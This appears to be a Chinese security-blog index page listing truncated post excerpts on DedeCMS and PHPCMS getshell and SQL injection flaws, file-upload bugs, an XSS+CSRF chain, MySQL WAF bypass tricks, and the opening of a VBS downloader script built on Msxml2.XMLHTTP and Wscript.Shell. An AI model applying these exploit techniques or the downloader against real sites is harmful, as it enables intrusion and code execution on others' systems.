XXXX有限公司 网站系统渗透测试报告 &nbs...
11月21日373 views评论渗透
脆弱性
上传截断漏洞案例
教程更新至三十三课织梦GETSHELLEXP全利用过程
建站之星任意文件上传漏洞(续一)
什么是渗透测试
如今虚拟化在各个企业中应用的越来越多,且火热的云计算也依托于此技术。虚拟化技术确实能够使物理资源的利用更加灵活和便捷,那么虚拟机的安全性如何?相比传统架构,是否像传说中的一样安全?
11月21日265 views评论cpu
虚拟化
dedecms最新版本修改任意管理员漏洞【配图】
此漏洞无视gpc转义,过80sec注入防御。 补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL? 起因是全局变量$GLOBALS可以被任意...
11月21日315 views评论v
漏洞
PHPCMS前台设计缺陷导致任意代码执行
PHPCMS前台设计缺陷导致任意代码执行 作者:felixk3y PHPCMS前台存在严重设计缺陷 利用这个设计缺陷可导致任意代码/命令执行,当然可Getshell. 但PHPCM...
11月21日357 views评论phpcms
代码执行
vbs下载者
一、VBS下载者: Set Post = CreateObject("Msxml2.XMLHTTP") Set Shell = CreateObject("Wscript.Shell") Post.O...
11月21日moonsec_com300 views评论post
shell
dedecms利用xss+csrf getshell
最近确实很忙,很久不更新博客了。 dedecms的漏洞很多,但是厂商都是不做修复。 之前乌云爆的一个二次注入的漏洞,其中title能够xss,但是官方只是修复了注入,xss并没有修...
11月21日527 views评论request
xss
DedeCMS会员中心短消息SQL注射0day漏洞
作者:c4rp3nt3r 主页:http://www.0x50sec.org需要:magic_quotes_gpc = OffDedeCMS会员中心短消息SQL注射漏洞,成功利用此...
11月21日moonsec_com311 views评论select
漏洞
[使用Hash直接登录Windows]简单分析
waf绕过:基于mysql特性的waf绕过技巧小总结
研究过国内外的waf。分享一些 奇淫绝技。 一些大家都了解的技巧如:/*!*/,SELECT[0x09,0x0A-0x0D,0x20,0xA0]xx FROM 不再重造轮子。 Mysql tips1:...
11月21日moonsec_com417 views评论mysql
waf
1156